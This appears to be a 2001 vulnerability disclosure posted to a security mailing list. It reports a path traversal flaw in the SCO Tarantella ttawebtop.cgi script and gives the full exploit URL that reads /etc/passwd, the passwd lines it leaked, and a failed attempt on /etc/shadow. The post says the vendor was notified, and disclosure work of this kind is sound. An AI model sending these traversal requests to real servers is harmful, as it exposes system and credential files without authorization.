SCO Tarantella Remote file read via ttawebtop.cgi

[KF <dotslash () snosoft com>]

SCO has been notified of this issue. 


-------- Original Message --------
Subject: SCO Tarantella Remote file read via ttawebtop.cgi
Date: Mon, 18 Jun 2001 13:06:41 -0400
From: KF <dotslash () snosoft com>
To: recon () snosoft com


http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/
...


No perms to shadow... 

http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/shadow

 
File missing

The following file could not be found:

                                              
/tarantella/../../../../../../../../../../../../../../../etc/shadow

 Please give this information to a Tarantella Administrator.

-KF